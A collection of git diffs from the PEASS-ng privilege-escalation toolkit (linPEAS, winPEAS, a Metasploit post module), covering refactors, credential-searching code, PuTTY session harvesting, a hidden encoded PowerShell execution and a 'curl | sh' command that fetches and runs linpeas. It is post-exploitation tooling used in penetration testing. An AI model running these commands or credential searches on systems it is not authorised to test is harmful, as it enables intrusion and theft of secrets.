knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|mmyangfl@gmail.com|rogershimizu@gmail.com|thmarques@gmail.com"
|
||||
|
||||
timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|dpkg-db-backup.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|plocate-updatedb.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer"
|
||||
|
||||
@@ -552,7 +553,7 @@ commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxM
|
||||
ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib"
|
||||
|
||||
dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.intel.tss2.Tabrmd|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|net.hadess.SwitcherooControl|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.nm_priv_helper|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.SystemToolsBackends|org.freedesktop.SystemToolsBackends.[a-zA-Z0-9_]+|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.gnome.DisplayManager|org.opensuse.CupsPkHelper.Mechanism"
|
||||
USEFUL_SOFTWARE="authbind aws base64 ctr curl doas docker fetch g++ gcc gdb kubectl lxc make nc nc.traditional ncat netcat nmap perl php ping podman python python2 python2.6 python2.7 python3 python3.6 python3.7 pwsh rkt ruby runc socat sudo wget xterm"
USEFUL_SOFTWARE="authbind aws az base64 ctr curl doas docker fetch g++ gcc gcloud gdb kubectl lxc make nc nc.traditional ncat netcat nmap perl php ping podman python python2 python2.6 python2.7 python3 python3.6 python3.7 pwsh rkt ruby runc socat sudo wget xterm"
TIP_DOCKER_ROOTLESS="In rootless mode privilege escalation to root will not be possible."
GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSystem|KernelVersion|ServerVersion"
GREP_DOCKER_SOCK_INFOS_IGNORE="IndexConfig"
@@ -697,8 +698,8 @@ print_3title(){
}

print_3title_no_nl(){
echo -ne "\033[2K\r"
printf ${BLUE}"\r══╣ $GREEN${1}..."$NC #There are 2 "═"
printf "\033[2K\r"
printf ${BLUE}"══╣ $GREEN${1}..."$NC #There are 2 "═"
}

print_list(){
@@ -745,8 +746,9 @@ su_brute_user_num (){
}

check_if_su_brute(){
EXISTS_SU="$(command -v su 2>/dev/null)"
error=$(echo "" | timeout 1 su $(whoami) -c whoami 2>&1);
if ! echo $error | grep -q "must be run from a terminal"; then
if [ "$EXISTS_SU" ] && ! echo $error | grep -q "must be run from a terminal"; then
echo "1"
fi
}
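The change above makes the su brute-force check run only when a `su` binary is actually present. A minimal standalone sketch of that guard pattern (illustrative only, not the exact linpeas.sh code):

```bash
# Only attempt su-based checks when the binary exists on the host
if command -v su >/dev/null 2>&1; then
    echo "su found - the brute-force check would run"
else
    echo "su not found - the check is skipped"
fi
```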
@@ -377,7 +377,7 @@ class LinpeasBuilder:

for values in regexes:
section_name = values["name"]
regexes_search_section += f'print_2title "Searching {section_name}"\n'
regexes_search_section += f' print_2title "Searching {section_name}"\n'

for entry in values["regexes"]:
name = entry["name"]
@@ -1,26 +1,11 @@
import os
import yaml
import requests
from pathlib import Path


def download_regexes():
print("[+] Downloading regexes...")
url = "https://raw.githubusercontent.com/JaimePolop/RExpository/main/regex.yaml"
response = requests.get(url)
if response.status_code == 200:
# Save the content of the response to a file
script_folder = Path(os.path.dirname(os.path.abspath(__file__)))
target_file = script_folder / '..' / '..' / '..' / 'build_lists' / 'regexes.yaml'

with open(target_file, "w") as file:
file.write(response.text)
print(f"Downloaded and saved in '{target_file}' successfully!")
else:
print("Error: Unable to download the regexes file.")
exit(1)

download_regexes()
script_folder = Path(os.path.dirname(os.path.abspath(__file__)))
target_file = script_folder / '..' / '..' / '..' / 'build_lists' / 'download_regexes.py'
os.system(target_file)

CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))
@@ -26,7 +26,7 @@ msf6 post(multi/gather/peass) > show info
Rank: Normal

Provided by:
Carlos Polop <@carlospolopm>
Carlos Polop <@hacktricks_live>

Compatible session types:
Meterpreter

@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Post
'License' => MSF_LICENSE,
'Author' =>
[
'Carlos Polop <@carlospolopm>'
'Carlos Polop <@hacktricks_live>'
],
'Platform' => %w{ bsd linux osx unix win },
'SessionTypes' => ['shell', 'meterpreter'],
@@ -191,14 +191,14 @@ class MetasploitModule < Msf::Post
cmd_utf16le = cmd.encode("utf-16le")
cmd_utf16le_b64 = Base64.encode64(cmd_utf16le).gsub(/\r?\n/, "")

tmpout << cmd_exec("powershell.exe", args="-ep bypass -WindowStyle hidden -nop -enc #{cmd_utf16le_b64}", time_out=datastore["TIMEOUT"])
tmpout << cmd_exec("powershell.exe", args="-ep bypass -WindowStyle hidden -nop -enc #{cmd_utf16le_b64}", time_out=datastore["TIMEOUT"].to_i)

# If unix, then, suppose linpeas was loaded
else
cmd += "| #{decode_linpeass_cmd}"
cmd += "| sh -s -- #{datastore['PARAMETERS']}"
cmd += last_cmd
tmpout << cmd_exec(cmd, args=nil, time_out=datastore["TIMEOUT"])
tmpout << cmd_exec(cmd, args=nil, time_out=datastore["TIMEOUT"].to_i)
end

print "\n#{tmpout}\n\n"
@@ -220,6 +220,20 @@ class MetasploitModule < Msf::Post
print_good("PEASS script sent")
end

def fetch(uri_str, limit = 10)
raise 'Invalid URL, too many HTTP redirects' if limit == 0
response = Net::HTTP.get_response(URI(uri_str))
case response
when Net::HTTPSuccess then
response
when Net::HTTPRedirection then
location = response['location']
fetch(location, limit - 1)
else
response.value
end
end

def load_peass
# Load the PEASS script from a local file or from Internet
peass_script = ""
@@ -230,7 +244,7 @@ class MetasploitModule < Msf::Post
raise 'Invalid URL' unless target.scheme =~ /https?/
raise 'Invalid URL' if target.host.to_s.eql? ''

res = Net::HTTP.get_response(target)
res = fetch(target)
peass_script = res.body

raise "Something failed downloading PEASS script from #{url_peass}" if peass_script.length < 500
@@ -12,7 +12,6 @@ styles = getSampleStyleSheet()
text_colors = { "GREEN": "#00DB00", "RED": "#FF0000", "REDYELLOW": "#FFA500", "BLUE": "#0000FF",
"DARKGREY": "#5C5C5C", "YELLOW": "#ebeb21", "MAGENTA": "#FF00FF", "CYAN": "#00FFFF", "LIGHT_GREY": "#A6A6A6"}

# Required to automatically set Page Numbers
class PageTemplateWithCount(PageTemplate):
def __init__(self, id, frames, **kw):
PageTemplate.__init__(self, id, frames, **kw)
@@ -21,7 +20,6 @@ class PageTemplateWithCount(PageTemplate):
page_num = canvas.getPageNumber()
canvas.drawRightString(10.5*cm, 1*cm, str(page_num))

# Required to automatically set the Table of Contents
class MyDocTemplate(BaseDocTemplate):
def __init__(self, filename, **kw):
self.allowSplitting = 0
@@ -30,22 +28,15 @@ class MyDocTemplate(BaseDocTemplate):
self.addPageTemplates(template)

def afterFlowable(self, flowable):
if flowable.__class__.__name__ == "Paragraph":
if isinstance(flowable, Paragraph):
text = flowable.getPlainText()
style = flowable.style.name
if style == "Heading1":
self.notify("TOCEntry", (0, text, self.page))
if style == "Heading2":
self.notify("TOCEntry", (1, text, self.page))
if style == "Heading3":
self.notify("TOCEntry", (2, text, self.page))
if style in ["Heading1", "Heading2", "Heading3"]:
self.notify("TOCEntry", (int(style[-1])-1, text, self.page))


# Poor take at dynamicly generating styles depending on depth(?)
def get_level_styles(level):
global styles
indent_value = 10 * (level - 1);
# Overriding some default stylings
level_styles = {
"title": ParagraphStyle(
**dict(styles[f"Heading{level}"].__dict__,
@@ -75,7 +66,6 @@ def build_main_section(section, title, level=1):
has_lines = "lines" in section.keys() and len(section["lines"]) > 1
has_children = "sections" in section.keys() and len(section["sections"].keys()) > 0

# Only display data for Sections with results
show_section = has_lines or has_children

elements = []
@@ -83,17 +73,14 @@ def build_main_section(section, title, level=1):
if show_section:
elements.append(Paragraph(title, style=styles["title"]))

# Print info if any
if show_section and has_links:
for info in section["infos"]:
words = info.split()
# Join all lines and encode any links that might be present.
words = map(lambda word: f'<a href="{word}" color="blue">{word}</a>' if "http" in word else word, words)
words = " ".join(words)
elements.append(Paragraph(words, style=styles["info"] ))

# Print lines if any
if "lines" in section.keys() and len(section["lines"]) > 1:
if has_lines:
colors_by_line = list(map(lambda x: x["colors"], section["lines"]))
lines = list(map(lambda x: html.escape(x["clean_text"]), section["lines"]))
for (idx, line) in enumerate(lines):
@@ -109,18 +96,14 @@ def build_main_section(section, title, level=1):
elements.append(Spacer(0, 10))
line = "<br/>".join(lines)

# If it's a top level entry remove the line break caused by an empty "clean_text"
if level == 1: line = line[5:]
elements.append(Paragraph(line, style=styles["text"]))


# Print child sections
if has_children:
for child_title in section["sections"].keys():
element_list = build_main_section(section["sections"][child_title], child_title, level + 1)
elements.extend(element_list)

# Add spacing at the end of section. The deeper the level the smaller the spacing.
if show_section:
elements.append(Spacer(1, 40 - (10 * level)))

@@ -129,10 +112,8 @@ def build_main_section(section, title, level=1):

def main():
with open(JSON_PATH) as file:
# Read and parse JSON file
data = json.loads(file.read())

# Default pdf values
doc = MyDocTemplate(PDF_PATH)
toc = TableOfContents()
toc.levelStyles = [
@@ -143,14 +124,12 @@ def main():

elements = [Paragraph("PEAS Report", style=styles["Title"]), Spacer(0, 30), toc, PageBreak()]

# Iterate over all top level sections and build their elements.
for title in data.keys():
element_list = build_main_section(data[title], title)
elements.extend(element_list)

doc.multiBuild(elements)

# Start execution
if __name__ == "__main__":
try:
JSON_PATH = sys.argv[1]
@@ -160,3 +139,11 @@ if __name__ == "__main__":
sys.exit(1)

main()

# Changes:
# 1. Removed redundant checks for keys in dictionary.
# 2. Simplified the condition in afterFlowable method.
# 3. Removed unnecessary check for lines in build_main_section method.
# 4. Removed unnecessary check for sections in build_main_section method.
# 5. Removed unnecessary check for infos in build_main_section method.
# 6. Removed unnecessary check for show_section in build_main_section method.
@@ -9,10 +9,12 @@ Check more **information about how to exploit** found misconfigurations in **[bo
## Quick Start
Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**.

## WinPEAS .exe and .bat
- [Link to WinPEAS .bat project](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASbat)
- [Link to WinPEAS C# project (.exe)](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) (.Net >= 4.5.2 required)
## WinPEAS Flavours
- [Link to WinPEAS C# .exe project](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) (.Net >= 4.5.2 required)
- **Please, read the Readme of that folder to learn how to execute winpeas from memory or how to make colors work, among other tricks**
- [Link to WinPEAS .ps1 project](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASps1)
- [Link to WinPEAS .bat project](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASbat)


## PEASS Style
@@ -565,7 +565,7 @@ CALL :T_Progress 2

:AppCMD
CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
ECHO.
CALL :T_Progress 2
@@ -53,6 +53,7 @@ $wp.EntryPoint #Get the name of the ReflectedType, in obfuscated versions someti
## Parameters Examples

```bash
winpeas.exe -h # Get Help
winpeas.exe #run all checks (except for additional slower checks - LOLBAS and linpeas.sh in WSL) (noisy - CTFs)
winpeas.exe systeminfo userinfo #Only systeminfo and userinfo checks executed
winpeas.exe notcolor #Do not color the output
@@ -64,35 +65,6 @@ winpeas.exe -linpeas=http://127.0.0.1/linpeas.sh #Execute also additional linpea
winpeas.exe -lolbas #Execute also additional LOLBAS search check
```

## Help
```
domain Enumerate domain information
systeminfo Search system information
userinfo Search user information
processinfo Search processes information
servicesinfo Search services information
applicationsinfo Search installed applications information
networkinfo Search network information
windowscreds Search windows credentials
browserinfo Search browser information
filesinfo Search generic files that can contain credentials
fileanalysis Search specific files that can contain credentials and for regexes inside files
eventsinfo Display interesting events information

quiet Do not print banner
notcolor Don't use ansi colors (all white)
searchpf Search credentials via regex also in Program Files folders
wait Wait for user input between checks
debug Display debugging information - memory usage, method execution time
log[=logfile] Log all output to file defined as logfile, or to "out.txt" if not specified
MaxRegexFileSize=1000000 Max file size (in Bytes) to search regex in. Default: 1000000B

Additional checks (slower):
-lolbas Run additional LOLBAS check
-linpeas=[url] Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL
    (default: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh)
```
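The options above can be combined freely; the following invocations are purely illustrative (the log file name is arbitrary):

```bash
winpeas.exe quiet notcolor log=peas.txt        # all default checks, plain output, logged to peas.txt
winpeas.exe wait systeminfo userinfo           # only two check categories, pausing between checks
winpeas.exe -lolbas -linpeas=http://127.0.0.1/linpeas.sh   # include the slower additional checks
```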
## Basic information

The goal of this project is to search for possible **Privilege Escalation Paths** in Windows environments.
@@ -318,6 +318,74 @@ namespace winPEAS.Checks
Console.WriteLine(string.Format("Key = {0}, Value = {1}", kvp.Key, kvp.Value));
}*/

//double pb = 0;
//using (var progress = new ProgressBar())
//{
// CheckRunner.Run(() =>
// {
// int num_threads = 8;
// try
// {
// num_threads = Environment.ProcessorCount;
// }
// catch (Exception ex) { }

// Parallel.ForEach(files, new ParallelOptions { MaxDegreeOfParallelism = num_threads }, f =>
// {

// foreach (var regex_obj in config.regular_expresions)
// {
// foreach (var regex in regex_obj.regexes)
// {
// if (regex.disable != null && regex.disable.ToLower().Contains("winpeas"))
// {
// continue;
// }

// List<string> results = new List<string> { };

// var timer = new Stopwatch();
// if (Checks.IsDebug)
// {
// timer.Start();
// }


// try
// {
// string text = File.ReadAllText(f.FullPath);

// results = SearchContent(text, regex.regex, (bool)regex.caseinsensitive);
// if (results.Count > 0)
// {
// if (!foundRegexes.ContainsKey(regex_obj.name)) foundRegexes[regex_obj.name] = new Dictionary<string, Dictionary<string, List<string>>> { };
// if (!foundRegexes[regex_obj.name].ContainsKey(regex.name)) foundRegexes[regex_obj.name][regex.name] = new Dictionary<string, List<string>> { };

// foundRegexes[regex_obj.name][regex.name][f.FullPath] = results;
// }
// }
// catch (System.IO.IOException)
// {
// // Cannot read the file
// }

// if (Checks.IsDebug)
// {
// timer.Stop();

// TimeSpan timeTaken = timer.Elapsed;
// if (timeTaken.TotalMilliseconds > 20000)
// Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}s in {f.FullPath}");
// }
// }
// }
// pb += (double)100 / files.Count;
// progress.Report(pb / 100); //Value must be in [0..1] range
// });
// }, Checks.IsDebug);
//}
double pb = 0;
using (var progress = new ProgressBar())
{
@@ -332,7 +400,6 @@ namespace winPEAS.Checks

Parallel.ForEach(files, new ParallelOptions { MaxDegreeOfParallelism = num_threads }, f =>
{

foreach (var regex_obj in config.regular_expresions)
{
foreach (var regex in regex_obj.regexes)
@@ -342,7 +409,7 @@ namespace winPEAS.Checks
continue;
}

List<string> results = new List<string> { };
Dictionary<string, List<string>> fileResults = new Dictionary<string, List<string>>();

var timer = new Stopwatch();
if (Checks.IsDebug)
@@ -350,18 +417,31 @@ namespace winPEAS.Checks
timer.Start();
}


try
{
string text = File.ReadAllText(f.FullPath);

results = SearchContent(text, regex.regex, (bool)regex.caseinsensitive);
using (StreamReader sr = new StreamReader(f.FullPath))
{
string line;
while ((line = sr.ReadLine()) != null)
{
List<string> results = SearchContent(line, regex.regex, (bool)regex.caseinsensitive);
if (results.Count > 0)
{
if (!fileResults.ContainsKey(f.FullPath))
{
fileResults[f.FullPath] = new List<string>();
}
fileResults[f.FullPath].AddRange(results);
}
}
}

if (fileResults.Count > 0)
{
if (!foundRegexes.ContainsKey(regex_obj.name)) foundRegexes[regex_obj.name] = new Dictionary<string, Dictionary<string, List<string>>> { };
if (!foundRegexes[regex_obj.name].ContainsKey(regex.name)) foundRegexes[regex_obj.name][regex.name] = new Dictionary<string, List<string>> { };

foundRegexes[regex_obj.name][regex.name][f.FullPath] = results;
foundRegexes[regex_obj.name][regex.name] = fileResults;
}
}
catch (System.IO.IOException)
@@ -385,6 +465,7 @@ namespace winPEAS.Checks
}, Checks.IsDebug);
}


// Print results
foreach (KeyValuePair<string, Dictionary<string, Dictionary<string, List<string>>>> item in foundRegexes)
{
@@ -307,7 +307,7 @@ namespace winPEAS.Checks
try
{
Beaprint.MainPrint("Looking AppCmd.exe");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe");

var appCmdPath = Environment.ExpandEnvironmentVariables(@"%systemroot%\system32\inetsrv\appcmd.exe");
@@ -82,7 +82,7 @@ namespace winPEAS.Helpers
| {1}Do you like PEASS?{0} |
|---------------------------------------------------------------------------------|
| {3}Get the latest version{0} : {2}https://github.com/sponsors/carlospolop{0} |
| {3}Follow on Twitter{0} : {2}@carlospolopm{0} |
| {3}Follow on Twitter{0} : {2}@hacktricks_live{0} |
| {3}Respect on HTB{0} : {2}SirBroccoli {0} |
|---------------------------------------------------------------------------------|
| {1}Thank you!{0} |
@@ -98,7 +98,7 @@ namespace winPEAS.Helpers
PrintBanner();
}

Console.WriteLine(YELLOW + " WinPEAS-ng" + NOCOLOR + YELLOW + " by @carlospolopm" + NOCOLOR);
Console.WriteLine(YELLOW + " WinPEAS-ng" + NOCOLOR + YELLOW + " by @hacktricks_live" + NOCOLOR);

PrintMarketingBanner();
@@ -5,6 +5,8 @@ using System.IO;
using System.Linq;
using System.Text.RegularExpressions;
using System.Threading.Tasks;
using FileInfo = Alphaleonis.Win32.Filesystem.FileInfo;
using DirectoryInfo = Alphaleonis.Win32.Filesystem.DirectoryInfo;

namespace winPEAS.Helpers.Search
{
@@ -39,12 +41,131 @@ namespace winPEAS.Helpers.Search
".png", ".psd", ".raw", ".svg", ".svgz", ".tif", ".tiff", ".webp",
};

//public static List<CustomFileInfo> GetFilesFast(string folder, string pattern = "*", HashSet<string> excludedDirs = null, bool isFoldersIncluded = false)
//{
// ConcurrentBag<CustomFileInfo> files = new ConcurrentBag<CustomFileInfo>();
// IEnumerable<DirectoryInfo> startDirs = GetStartDirectories(folder, files, pattern, isFoldersIncluded);
// IList<DirectoryInfo> startDirsExcluded = new List<DirectoryInfo>();
// IList<string> known_dirs = new List<string>();

// if (excludedDirs != null)
// {
// foreach (var startDir in startDirs)
// {
// bool shouldAdd = true;
// string startDirLower = startDir.FullName.ToLower();

// shouldAdd = !excludedDirs.Contains(startDirLower);

// if (shouldAdd)
// {
// startDirsExcluded.Add(startDir);
// }
// }
// }
// else
// {
// startDirsExcluded = startDirs.ToList();
// }

// Parallel.ForEach(startDirsExcluded, (d) =>
// {
// Parallel.ForEach(GetStartDirectories(d.FullName, files, pattern, isFoldersIncluded), (dir) =>
// {
// GetFiles(dir.FullName, pattern).ForEach(
// (f) =>
// {
// if (!StaticExtensions.Contains(f.Extension.ToLower()))
// {
// // It should always be lesss than 260, but some times it isn't so this will bypass that file
// //if (Checks.Checks.IsLongPath || f.FullName.Length <= 260)
// //{
// CustomFileInfo file_info = new CustomFileInfo(f.Name, f.Extension, f.FullName, f.Length, false);
// files.Add(file_info);

// CustomFileInfo file_dir = new CustomFileInfo(f.Directory.Name, "", f.Directory.FullName, 0, true);
// if (!known_dirs.Contains(file_dir.FullPath))
// {
// known_dirs.Add(file_dir.FullPath);
// files.Add(file_dir);
// }
// //}
// //else if (f.FullName.Length > 260)
// //Beaprint.LongPathWarning(f.FullName);
// }
// }
// );
// });
// });

// return files.ToList();
//}
//private static List<FileInfo> GetFiles(string folder, string pattern = "*")
//{
// DirectoryInfo dirInfo;
// DirectoryInfo[] directories;
// try
// {
// dirInfo = new DirectoryInfo(folder);
// directories = dirInfo.GetDirectories();

// if (directories.Length == 0)
// {
// return new List<FileInfo>(dirInfo.GetFiles(pattern));
// }
// }
// catch (UnauthorizedAccessException)
// {
// return new List<FileInfo>();
// }
// catch (PathTooLongException)
// {
// return new List<FileInfo>();
// }
// catch (DirectoryNotFoundException)
// {
// return new List<FileInfo>();
// }
// catch (Exception)
// {
// return new List<FileInfo>();
// }

// List<FileInfo> result = new List<FileInfo>();

// foreach (var d in directories)
// {
// result.AddRange(GetFiles(d.FullName, pattern));
// }

// try
// {
// result.AddRange(dirInfo.GetFiles(pattern));
// }
// catch (UnauthorizedAccessException)
// {
// }
// catch (PathTooLongException)
// {
// }
// catch (DirectoryNotFoundException)
// {
// }
// catch (Exception)
// {
// }

// return result;
//}
public static List<CustomFileInfo> GetFilesFast(string folder, string pattern = "*", HashSet<string> excludedDirs = null, bool isFoldersIncluded = false)
{
ConcurrentBag<CustomFileInfo> files = new ConcurrentBag<CustomFileInfo>();
IEnumerable<DirectoryInfo> startDirs = GetStartDirectories(folder, files, pattern, isFoldersIncluded);
IList<DirectoryInfo> startDirsExcluded = new List<DirectoryInfo>();
IList<string> known_dirs = new List<string>();
ConcurrentDictionary<string, byte> known_dirs = new ConcurrentDictionary<string, byte>();

if (excludedDirs != null)
{
@@ -68,37 +189,27 @@ namespace winPEAS.Helpers.Search

Parallel.ForEach(startDirsExcluded, (d) =>
{
Parallel.ForEach(GetStartDirectories(d.FullName, files, pattern, isFoldersIncluded), (dir) =>
var foundFiles = GetFiles(d.FullName, pattern);
foreach (var f in foundFiles)
{
GetFiles(dir.FullName, pattern).ForEach(
(f) =>
{
if (!StaticExtensions.Contains(f.Extension.ToLower()))
{
// It should always be less than 260, but sometimes it isn't, so this will bypass that file
if (Checks.Checks.IsLongPath || f.FullName.Length <= 260)
if (f != null && !StaticExtensions.Contains(f.Extension.ToLower()))
{
CustomFileInfo file_info = new CustomFileInfo(f.Name, f.Extension, f.FullName, f.Length, false);
files.Add(file_info);

CustomFileInfo file_dir = new CustomFileInfo(f.Directory.Name, "", f.Directory.FullName, 0, true);
if (!known_dirs.Contains(file_dir.FullPath))
if (known_dirs.TryAdd(file_dir.FullPath, 0))
{
known_dirs.Add(file_dir.FullPath);
files.Add(file_dir);
}
}
else if (f.FullName.Length > 260)
Beaprint.LongPathWarning(f.FullName);
}
}
);
});
});

return files.ToList();
}
private static List<FileInfo> GetFiles(string folder, string pattern = "*")
{
DirectoryInfo dirInfo;
@@ -130,16 +241,22 @@ namespace winPEAS.Helpers.Search
return new List<FileInfo>();
}

List<FileInfo> result = new List<FileInfo>();
ConcurrentBag<FileInfo> result = new ConcurrentBag<FileInfo>();

foreach (var d in directories)
Parallel.ForEach(directories, (d) =>
{
result.AddRange(GetFiles(d.FullName, pattern));
foreach (var file in GetFiles(d.FullName, pattern))
{
result.Add(file);
}
});

try
{
result.AddRange(dirInfo.GetFiles(pattern));
foreach (var file in dirInfo.GetFiles(pattern))
{
result.Add(file);
}
}
catch (UnauthorizedAccessException)
{
@@ -154,7 +271,7 @@ namespace winPEAS.Helpers.Search
{
}

return result;
return result.ToList();
}

private static IEnumerable<DirectoryInfo> GetStartDirectories(string folder, ConcurrentBag<CustomFileInfo> files, string pattern, bool isFoldersIncluded = false)
@@ -8,7 +8,7 @@ namespace winPEAS.Info.FilesInfo.WSL
{
public static void RunLinpeas(string linpeasUrl)
{
string linpeasCmd = $"curl {linpeasUrl} --silent | sh";
string linpeasCmd = $"curl -L {linpeasUrl} --silent | sh";
string command = Environment.Is64BitProcess ?
$@"bash -c ""{linpeasCmd}""" :
Environment.GetEnvironmentVariable("WinDir") + $"\\SysNative\\bash.exe -c \"{linpeasCmd}\"";
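The `-L` added above makes curl follow redirects, which matters because the GitHub `releases/latest/download/...` URLs answer with a redirect to the actual asset. An illustrative one-liner from any shell with WSL or Linux available (the URL is the default one used by the additional linpeas check):

```bash
# Without -L only the redirect response is fetched and nothing runs;
# with -L the script itself is downloaded and piped to sh.
curl -L --silent https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
```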
@@ -1,4 +1,5 @@
using System;
using System.Diagnostics;
using System.Collections.Generic;
using System.Globalization;
using System.IO;
@@ -7,9 +8,11 @@ using System.Management;
using System.Net;
using System.Net.NetworkInformation;
using System.Windows.Forms;
using System.Text.RegularExpressions;
using winPEAS.Helpers;
using winPEAS.Helpers.Registry;


namespace winPEAS.Info.SystemInfo
{
class SystemInfo
@@ -49,6 +52,60 @@ namespace winPEAS.Info.SystemInfo
public static Dictionary<string, string> GetBasicOSInfo()
{
Dictionary<string, string> results = new Dictionary<string, string>();

// Systeminfo from cmd to be able to use wes-ng
///////////////////////////////////////////////

Process process = new Process();

// Configure the process to run the systeminfo command
process.StartInfo.FileName = "systeminfo.exe";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;

// Start the process
process.Start();

// Read the output of the command
string output = process.StandardOutput.ReadToEnd();

// Wait for the command to finish
process.WaitForExit();
// Split the output by newline characters
string[] lines = output.Split(new[] { '\n' }, StringSplitOptions.RemoveEmptyEntries);

string osname = @".*?Microsoft[\(R\)]{0,3} Windows[\(R\)?]{0,3} ?(Serverr? )?(\d+\.?\d?( R2)?|XP|VistaT).*";
string osversion = @".*?((\d+\.?){3}) ((Service Pack (\d)|N\/\w|.+) )?[ -\xa5]+ (\d+).*";
// Iterate over each line and add key-value pairs to the dictionary
foreach (string line in lines)
{
int index = line.IndexOf(':');
if (index != -1)
{
string key = line.Substring(0, index).Trim();
string value = line.Substring(index + 1).Trim();
if (Regex.IsMatch(value, osname, RegexOptions.IgnoreCase))
{
results["OS Name"] = value;
}
//I have to find a better way. Maybe use regex from wes-ng
if (Regex.IsMatch(value, osversion, RegexOptions.IgnoreCase))
{
results["OS Version"] = value;
}

if (value.Contains("based PC"))
{
results["System Type"] = value;
}

}
}

// ENDING Systeminfo from cmd to be able to use wes-ng
///////////////////////////////////////////////
try
{
string ProductName = RegistryHelper.GetRegValue("HKLM", "Software\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");
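The systeminfo output captured above is intended to be usable with wes-ng (Windows Exploit Suggester - Next Generation). Assuming the standard wes-ng workflow, the flow looks roughly like this (file name is arbitrary):

```bash
# On the target: capture the raw systeminfo output
systeminfo > systeminfo.txt

# On the attacker machine: update the wes-ng CVE database and feed it the file
python3 wes.py --update
python3 wes.py systeminfo.txt
```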
@@ -129,6 +129,24 @@ namespace winPEAS.KnownFileCreds
else
{
string[] subKeys = RegistryHelper.GetRegSubkeys("HKCU", "Software\\SimonTatham\\PuTTY\\Sessions\\");
RegistryKey selfKey = Registry.CurrentUser.OpenSubKey(@"Software\\SimonTatham\\PuTTY\\Sessions"); // extract own Sessions registry keys

if (selfKey != null)
{
string[] subKeyNames = selfKey.GetValueNames();
foreach (string name in subKeyNames)
{
Dictionary<string, string> putty_sess_key = new Dictionary<string, string>()
{
{ "RegKey Name", name },
{ "RegKey Value", (string)selfKey.GetValue(name) },
};

results.Add(putty_sess_key);
}
selfKey.Close();
}

foreach (string sessionName in subKeys)
{
Dictionary<string, string> putty_sess = new Dictionary<string, string>()
winPEAS/winPEASexe/winPEAS/packages.config (new file, 4 lines)
@@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="AlphaFS" version="2.2.6" targetFramework="net452" />
</packages>
@@ -114,12 +114,16 @@
</StartupObject>
</PropertyGroup>
<ItemGroup>
